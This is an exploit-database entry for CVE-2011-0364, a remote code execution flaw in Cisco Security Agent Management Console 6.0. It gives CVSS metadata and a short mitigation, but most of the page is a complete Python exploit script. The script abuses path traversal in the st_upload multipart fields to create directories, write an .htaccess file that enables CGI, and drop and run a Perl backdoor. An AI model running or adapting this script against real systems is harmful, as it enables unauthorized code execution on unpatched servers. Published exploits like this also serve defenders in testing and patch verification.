Exploits Cisco Security Agent Management Console ‘st_upload’ (CVE-2011-0364)

vendor:

Security Agent Management Console

by:

Gerry Eisenhaur

9.3

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Security Agent Management Console

Affected Version From: 6

Affected Version To: 6

Patch Exists: YES

Related CWE: CVE-2011-0364

CPE: a:cisco:security_agent_management_console:6.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2011

Exploits Cisco Security Agent Management Console ‘st_upload’ (CVE-2011-0364)

This exploit is used to gain access to the Cisco Security Agent Management Console by creating a directory tree and dropping malicious files. The malicious files include an .htaccess file to enable scripting and a backdoor file to gain command access.

Mitigation:

Disable the st_upload feature in the Cisco Security Agent Management Console.

Source

Exploit-DB raw data:

#!/usr/bin/env python
# Exploits Cisco Security Agent Management Console ‘st_upload’ (CVE-2011-0364)
# gerry eisenhaur <gerry.eisenhaur _at_ gmail.com>

import httplib
import mimetools
import StringIO

_boundary = mimetools.choose_boundary()
_host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB'
_csamc = "192.168.0.108"

# we need to enable some scripting to get command access
htaccess = "Options +Includes +ExecCGI\r\nAddHandler cgi-script gee"
perl_path = "#!c:/program files/cisco/csamc/csamc60/perl/5.8.7/bin/mswin32-x86/perl\r\n",
backdoor = "exec \"calc.exe\";"

def send_request(params=None):
    buf = StringIO.StringIO()
    headers = {"Content-type": 'multipart/form-data; boundary=%s' % _boundary}

    for(key, value) in params.iteritems():
        buf.write('--%s\r\n' % _boundary)
        buf.write('Content-Disposition: form-data; name="%s"' % key)
        buf.write('\r\n\r\n%s\r\n' % value)
    buf.write('--' + _boundary + '--\r\n\r\n')
    body = buf.getvalue()

    conn = httplib.HTTPSConnection(_csamc)
    conn.request("POST", "/csamc60/agent", body, headers)
    response = conn.getresponse()
    print response.status, response.reason
    conn.close()

def main():
    ### Build up required dir tree
    dirtree = ["../bin/webserver/htdocs/diag/bin",
               "../bin/webserver/htdocs/diag/bin/webserver",
               "../bin/webserver/htdocs/diag/bin/webserver/htdocs"]
    _params = {
        'host_uid': _host_uid,
        'jobname': None,
        'host': "aa",
        'diags': " ",
        'diagsu': " ",
        'profiler': " ",
        'extension': "gee",
    }
    for path in dirtree:
        print "[+] Creating directory: %s" % path
        _params['jobname'] = path
        send_request(_params)

    ### Done building path, drop files
    print "[+] Dropping .htaccess"
    send_request({
        'host_uid': _host_uid,
        'jobname': '',
        'host': "/../bin/webserver/",
        'diags': "",
        'diagsu': "",
        'profiler': htaccess,
        'extension': "/../.htaccess",
    })

    print "[+] Dropping payload"
    send_request({
        'host_uid': _host_uid,
        'jobname': '',
        'host': "/../bin/webserver/htdocs/gerry",
        'diags': perl_path,
        'diagsu': "",
        'profiler': backdoor,
        'extension': "/../exploit.gee",
    })

    print "[+] Done, Executing dropped file."
    try:
        conn = httplib.HTTPSConnection(_csamc, timeout=1)
        conn.request("GET", "/csamc60/exploit.gee")
        response = conn.getresponse()
        print response.status, response.reason
        print response.read()
    except httplib.ssl.SSLError:
        pass
    print "[+] Finished."

if __name__ == '__main__':
    main()